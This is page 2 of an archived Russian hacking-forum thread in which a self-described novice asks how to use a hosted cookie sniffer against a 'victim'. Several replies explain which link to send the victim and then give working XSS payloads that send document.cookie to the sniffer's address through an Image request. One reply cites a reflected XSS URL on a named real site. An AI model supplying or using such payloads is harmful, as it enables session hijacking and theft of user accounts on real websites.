ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
Перезагрузить страницу Принцип работы сниффера
   
Ответ
Страница 2 из 4 < 1 2 3 4 >
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 23.01.2007, 09:21
Skiba
Banned
Регистрация: 19.09.2006
Сообщений: 25
Провел на форуме:
46374

Репутация: -14
По умолчанию
http://antichat.org/sniffer
 
Ответить с цитированием

  #12  
Старый 23.01.2007, 16:07
Pashahak
Banned
Регистрация: 16.01.2007
Сообщений: 18
Провел на форуме:
62578

Репутация: -20
По умолчанию
Спасибо конечно что откликнулся, я этот сниффер видел уже, но легкомысленность ламерской души не имеет предела. Дело в том, что я не умею им пользоваться. Допустим я сделал сниффер с логином bla-bla. Тогда адрес сниффера будет выглядеть вот так http://antichat.org/s/bla-bla/log.php. Но я не пойму, какую ссылку мне жертве показывать надобно, а по какой самому заходить? Может кто не матернеться мышленно, да потратить на мою маленькую персону минуту времени???
 
Ответить с цитированием

  #13  
Старый 23.01.2007, 16:09
cardons
Познавший АНТИЧАТ
Регистрация: 19.07.2005
Сообщений: 1,000
Провел на форуме:
5868159

Репутация: 950


По умолчанию
Цитата:
Сообщение от Pashahak  
Тогда адрес сниффера будет выглядеть вот так http://antichat.org/s/bla-bla/log.php.
По этой ссылке у тебя будут отчеты снифера!
А ссылка на снифер вот так http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;
 
Ответить с цитированием

  #14  
Старый 23.01.2007, 16:10
goffog
Новичок
Регистрация: 06.11.2005
Сообщений: 13
Провел на форуме:
81890

Репутация: 1
По умолчанию
тебе надо заходить на http://antichat.org/s/bla-bla/log.php, а жертве http://antichat.org/s/bla-blaю.gif, нотак ты увидишь только его IP а что б стірить кукисі читай темі про XSS
 
Ответить с цитированием

  #15  
Старый 23.01.2007, 16:24
Fr-Ron
Участник форума
Регистрация: 10.09.2006
Сообщений: 185
Провел на форуме:
1654589

Репутация: 337
По умолчанию
Pashahak

Сразу на фастбб лезть - это жестоко =)
Потренировался бы на более уязвимых...
Дело то вот в чем - за счет своей системы бесплытнх форумов фастбб имеет очень нифиговую посещаемость. Ессно, рекламодатели туда ломануться, дабы куча народу заценила их фирму или что тама у них... Ну и ессно фастбб дерет нефиговые бабки с рекламодателей... Текстовая ссылка везде - 50 ВМЗ в НЕДЕЛЮ... Поэтому они будут беречь своих юзеров... Короче, если тебе сейчас скажут уявимость таких форумов, то, скороей всего, ее залатают в ближайшие 24 часа =) А найти там багу уже ой как не просто...
 
Ответить с цитированием

  #16  
Старый 23.01.2007, 20:08
Pashahak
Banned
Регистрация: 16.01.2007
Сообщений: 18
Провел на форуме:
62578

Репутация: -20
По умолчанию
Цитата:
Сообщение от cardons  
По этой ссылке у тебя будут отчеты снифера!
А ссылка на снифер вот так http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;
Что-то я не понимаю, при чем та ссылка именно к моему снифферу зарегеному, и как вообще инфо отправиться на мой сниффер bla-bla если в ней нету и намека на него?
 
Ответить с цитированием

  #17  
Старый 23.01.2007, 20:12
Pashahak
Banned
Регистрация: 16.01.2007
Сообщений: 18
Провел на форуме:
62578

Репутация: -20
По умолчанию
Цитата:
Сообщение от Fr-Ron  
Pashahak

Сразу на фастбб лезть - это жестоко =)
Потренировался бы на более уязвимых...
Дело то вот в чем - за счет своей системы бесплытнх форумов фастбб имеет очень нифиговую посещаемость. Ессно, рекламодатели туда ломануться, дабы куча народу заценила их фирму или что тама у них... Ну и ессно фастбб дерет нефиговые бабки с рекламодателей... Текстовая ссылка везде - 50 ВМЗ в НЕДЕЛЮ... Поэтому они будут беречь своих юзеров... Короче, если тебе сейчас скажут уявимость таких форумов, то, скороей всего, ее залатают в ближайшие 24 часа =) А найти там багу уже ой как не просто...
Тьху мля как дела плохи, действительно, нус, что ж, мож кто прямую ссылочку на XSS для фастББ даст тупому ламеру?
 
Ответить с цитированием

  #18  
Старый 23.01.2007, 20:19
Pashahak
Banned
Регистрация: 16.01.2007
Сообщений: 18
Провел на форуме:
62578

Репутация: -20
По умолчанию
Пацаны, а допустим есть XSS http://www.neora.ru/anketa/index.php?latter="><script>alert()</script> как ее перекрутить чтоб кукисы украсть с помощью высше описанного сниффера ( тут мне ничего не нужно, я только принцип узнать хочу ) Заранее спасибо.
 
Ответить с цитированием

  #19  
Старый 23.01.2007, 21:45
Fr-Ron
Участник форума
Регистрация: 10.09.2006
Сообщений: 185
Провел на форуме:
1654589

Репутация: 337
По умолчанию
По теории вместо
alert()
ставишь
img = new Image(); img.src = "АДРЕС_ТВОЕГО_СНИФЕРА?"+document .cookie;
 
Ответить с цитированием

  #20  
Старый 23.01.2007, 21:48
goffog
Новичок
Регистрация: 06.11.2005
Сообщений: 13
Провел на форуме:
81890

Репутация: 1
По умолчанию
<script language="JavaScript">aa1 = new Image(); aa1.src="Сниффер"+document.cookie;</script>
 
Ответить с цитированием
Ответ
Страница 2 из 4 < 1 2 3 4 >



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Firewall: принцип работы D=P=CH= MOD= Защита ОС: вирусы, антивирусы, файрволы. 0 02.10.2006 22:36
Принцип работы джойнеров на php. drmist Авторские статьи 11 02.05.2006 14:37
Как «растянуть» аккумулятор novichok Сотовый фрикинг 4 28.02.2006 22:47
Принцип работы АОН dinar_007 Сотовый фрикинг 0 07.02.2006 14:20
Логи Сниффера Jonathan Allen Болталка 10 04.12.2005 20:47



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ